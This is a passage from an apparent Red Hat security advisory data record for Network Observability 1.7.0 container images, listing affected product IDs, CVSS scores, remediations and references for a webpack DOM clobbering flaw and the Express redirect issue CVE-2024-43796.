"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", 